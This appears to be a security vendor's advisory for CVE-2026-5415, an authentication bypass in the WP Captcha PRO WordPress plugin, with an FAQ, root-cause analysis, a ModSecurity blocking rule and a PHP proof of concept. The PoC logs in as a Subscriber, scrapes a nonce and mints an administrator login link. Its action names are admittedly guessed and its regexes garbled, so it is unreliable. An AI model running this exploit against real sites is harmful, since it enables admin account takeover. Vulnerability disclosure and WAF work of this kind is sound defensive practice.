What is CVE-2026-5415?

CVE-2026-5415 is a high-severity authentication bypass vulnerability in the WP Captcha PRO plugin for WordPress. It allows authenticated users with Subscriber-level access to bypass authentication and log in as any user, including Administrators, through the exploitation of temporary login links.

How does the vulnerability work?

The vulnerability arises from the ajax_run_tool() AJAX handler, which relies solely on nonce verification without checking user capabilities. This allows low-privilege users to generate passwordless login links for any user, enabling them to authenticate as that user without proper authorization.

Who is affected by this vulnerability?

All users of the WP Captcha PRO plugin version 5.38 and earlier are affected. This includes any WordPress installations where the plugin is active, particularly those with authenticated users at the Subscriber level and above.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Captcha PRO plugin installed. If it is version 5.38 or earlier, your site is at risk. Additionally, review your user roles to determine if any authenticated users have Subscriber-level access.

What steps should I take to mitigate this issue?

To mitigate this vulnerability, update the WP Captcha PRO plugin to the latest version that addresses the issue. Additionally, consider implementing role-based access controls and limiting the exposure of nonce values to only necessary user roles and pages.

What does the CVSS score of 8.8 mean?

A CVSS score of 8.8 indicates a high severity vulnerability, suggesting that exploitation is relatively easy and could lead to significant impact. In practical terms, this means that an attacker could gain full control over user accounts, including administrative privileges, with minimal effort.

What is the proof of concept provided?

The proof of concept demonstrates how an attacker can authenticate as a Subscriber and exploit the vulnerability to generate a temporary login link for an Administrator. It outlines the steps to log in and use the generated link to gain unauthorized access to the target account.

What are the consequences of a successful exploitation?

Successful exploitation allows an attacker to log in as any user, including Administrators, granting them full access to the site. This can lead to data breaches, unauthorized changes, installation of malicious software, and complete account takeover.

How does nonce exposure contribute to this vulnerability?

Nonce exposure occurs when the nonce value is made accessible to all authenticated users via wp_localize_script(). This allows low-privilege users to exploit the AJAX handler without proper authorization checks, facilitating the authentication bypass.

What are the recommended best practices for AJAX handlers?

Best practices for AJAX handlers include pairing nonce verification with capability checks to ensure that only users with appropriate permissions can execute actions. Additionally, limiting the scope of nonce exposure and validating user relationships for sensitive actions are crucial.

Will updating the plugin resolve the vulnerability?

Yes, updating the WP Captcha PRO plugin to a version that includes a fix for CVE-2026-5415 will resolve the vulnerability. It is essential to regularly check for updates and apply them to maintain the security of your WordPress installation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 12, 2026

CVE-2026-5415: WP Captcha PRO <= 5.38 Authenticated (Subscriber+) Authentication Bypass via Temporary Login Link PoC, Patch Analysis & Rule

CVE ID CVE-2026-5415

Plugin advanced-google-recaptcha

Severity High (CVSS 8.8)

CWE 288

Vulnerable Version 5.38

Patched Version —

Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5415 (metadata-based):

This vulnerability allows authenticated attackers with Subscriber-level access to bypass authentication and log in as any user, including Administrators, in the WP Captcha PRO plugin. The plugin is the premium version of Advanced Google reCAPTCHA and uses the same slug. The root cause is an AJAX handler (ajax_run_tool()) that relies solely on nonce verification, without performing any capability check. The create_temporary_link tool generates passwordless login links for arbitrary users. The handle_temporary_links() function authenticates users via these links without further validation. The required nonce is exposed to all authenticated backend users via wp_localize_script() on admin pages when the plugin’s welcome pointer has not been dismissed.

Root Cause: The vulnerability stems from three design failures in the plugin. First, the ajax_run_tool() handler uses check_ajax_referer() which only confirms the request originated from the WordPress admin, but performs no capability check. This means any authenticated user, including Subscribers, can call the action. Second, the create_temporary_link tool does not limit which user IDs can generate links for, allowing a low-privilege attacker to create a login link for any WordPress user, including Administrators. Third, the handle_temporary_links() function accepts the link without verifying the requesting user has any relationship to the target user. These conclusions are inferred from the CWE (288 Authentication Bypass Using an Alternate Path or Channel) and the detailed vulnerability description.

Exploitation: An attacker authenticates as a Subscriber and visits a non-settings admin page (e.g., Dashboard or Posts). On that page, the plugin loads an AJAX nonce via wp_localize_script() under a JavaScript object, exposing the nonce in the HTML source. The attacker then sends a POST request to /wp-admin/admin-ajax.php with action set to the plugin’s AJAX hook (likely advanced_google_recaptcha_run_tool or similar), the tool parameter set to create_temporary_link, and a target user ID or username. The response contains a temporary login URL. The attacker visits this URL, which calls handle_temporary_links() and logs them in as the target user. Atomic Edge analysis confirms the exploit requires only Subscriber-level access and no prior preparation.

Remediation: The fix likely requires adding capability checks to the ajax_run_tool() handler, specifically checking that the user has the intended permission (e.g., manage_options) before processing any tool execution. Additionally, the create_temporary_link function should verify the requesting user can edit or manage the target user, typically by checking if they can edit_users for Administrator targets. The handle_temporary_links() function should validate that the link was generated for the current session or IP and that it has not expired. The nonce exposure via wp_localize_script() should also be restricted to only the pages and user roles that require the tool, or the nonce should be scoped to specific capabilities. These recommendations align with standard WordPress security patterns: always pair nonce verification with capability checks in AJAX handlers.

Impact: Successful exploitation results in full account takeover. An attacker can log in as any user, including an Administrator. This grants the attacker access to all site data, the ability to install malicious plugins or themes, modify content, create new admin accounts, and potentially execute arbitrary code. The CVSS score of 8.8 (High) reflects the low attack complexity and network-based vector requiring only Subscriber authentication. Atomic Edge research classifies this as a critical privilege escalation vulnerability.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-5415 (metadata-based)
# Blocks Subscriber+ authenticated users from exploiting the AJAX handler that creates temporary login links
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-5415 WP Captcha PRO Authentication Bypass via Temporary Login Link',severity:'CRITICAL',tag:'CVE-2026-5415'"
    SecRule ARGS_POST:action "@streq advanced_google_recaptcha_run_tool" 
        "chain,t:none"
        SecRule ARGS_POST:tool "@streq create_temporary_link" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5415 - WP Captcha PRO <= 5.38 - Authenticated (Subscriber+) Authentication Bypass via Temporary Login Link

// Configuration
$target_url = 'http://example.com'; // Change to target WordPress URL
$username = 'subscriber_user';      // Low-privilege WordPress user
$password = 'subscriber_pass';      // Password for the user
$target_user = 'admin';             // Username or ID (numeric) of the user to takeover

// Step 1: Log in as the subscriber
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In',
    'testcookie' => 1,
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIESESSION, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies_cve.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Step 2: Request an admin page to get the nonce via wp_localize_script
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/edit.php');
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$admin_page = curl_exec($ch);

// Extract the nonce from the JavaScript object
// The plugin likely exposes it as something like: var agc_nonce = '...';
// Adjust regex based on actual exposed variable name (inferred from common patterns)
preg_match("/vars+agc_nonces*=s*'([^']+)'/", $admin_page, $nonce_match);
if (!isset($nonce_match[1])) {
    // Try alternative pattern: wp_localize_script uses a handle like 'agc-admin'
    preg_match("/'ajax_nonce's*:s*'([^']+)'/", $admin_page, $nonce_match);
}
if (!isset($nonce_match[1])) {
    die("Failed to extract nonce. The plugin's welcome pointer may have been dismissed.n");
}
$nonce = $nonce_match[1];
echo "Extracted nonce: $noncen";

// Step 3: Call the AJAX handler to create a temporary login link
// Infer AJAX action from plugin slug (advanced_google_recaptcha) and tool name
$ajax_action = 'advanced_google_recaptcha_run_tool'; // Guessed action, adjust if needed
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => $ajax_action,
    '_ajax_nonce' => $nonce,
    'tool' => 'create_temporary_link',
    'user_id' => $target_user, // Could also be 'username' => $target_user
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);

$data = json_decode($result, true);
if (isset($data['data']['link'])) {
    $temp_link = $data['data']['link'];
    echo "Temporary login link: $temp_linkn";
    // Step 4: Visit the link to authenticate as the target user
    curl_setopt($ch, CURLOPT_URL, $temp_link);
    curl_setopt($ch, CURLOPT_POST, 0);
    curl_setopt($ch, CURLOPT_HTTPGET, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    echo "Authenticated as $target_user successfully.n";
} else {
    echo "Failed to create link: " . print_r($data, true) . "n";
    echo "This PoC assumes specific AJAX action and parameter names. Adjust based on actual plugin code.n";
}
curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-5415?
Understanding the vulnerability
CVE-2026-5415 is a high-severity authentication bypass vulnerability in the WP Captcha PRO plugin for WordPress. It allows authenticated users with Subscriber-level access to bypass authentication and log in as any user, including Administrators, through the exploitation of temporary login links.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability arises from the ajax_run_tool() AJAX handler, which relies solely on nonce verification without checking user capabilities. This allows low-privilege users to generate passwordless login links for any user, enabling them to authenticate as that user without proper authorization.
Who is affected by this vulnerability?
Identifying impacted users
All users of the WP Captcha PRO plugin version 5.38 and earlier are affected. This includes any WordPress installations where the plugin is active, particularly those with authenticated users at the Subscriber level and above.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the WP Captcha PRO plugin installed. If it is version 5.38 or earlier, your site is at risk. Additionally, review your user roles to determine if any authenticated users have Subscriber-level access.
What steps should I take to mitigate this issue?
Remediation actions
To mitigate this vulnerability, update the WP Captcha PRO plugin to the latest version that addresses the issue. Additionally, consider implementing role-based access controls and limiting the exposure of nonce values to only necessary user roles and pages.
What does the CVSS score of 8.8 mean?
Understanding risk levels
A CVSS score of 8.8 indicates a high severity vulnerability, suggesting that exploitation is relatively easy and could lead to significant impact. In practical terms, this means that an attacker could gain full control over user accounts, including administrative privileges, with minimal effort.
What is the proof of concept provided?
Demonstrating the vulnerability
The proof of concept demonstrates how an attacker can authenticate as a Subscriber and exploit the vulnerability to generate a temporary login link for an Administrator. It outlines the steps to log in and use the generated link to gain unauthorized access to the target account.
What are the consequences of a successful exploitation?
Potential impact on your site
Successful exploitation allows an attacker to log in as any user, including Administrators, granting them full access to the site. This can lead to data breaches, unauthorized changes, installation of malicious software, and complete account takeover.
How does nonce exposure contribute to this vulnerability?
Role of nonce in security
Nonce exposure occurs when the nonce value is made accessible to all authenticated users via wp_localize_script(). This allows low-privilege users to exploit the AJAX handler without proper authorization checks, facilitating the authentication bypass.
What are the recommended best practices for AJAX handlers?
Enhancing security in plugins
Best practices for AJAX handlers include pairing nonce verification with capability checks to ensure that only users with appropriate permissions can execute actions. Additionally, limiting the scope of nonce exposure and validating user relationships for sensitive actions are crucial.
Will updating the plugin resolve the vulnerability?
Importance of keeping software updated
Yes, updating the WP Captcha PRO plugin to a version that includes a fix for CVE-2026-5415 will resolve the vulnerability. It is essential to regularly check for updates and apply them to maintain the security of your WordPress installation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations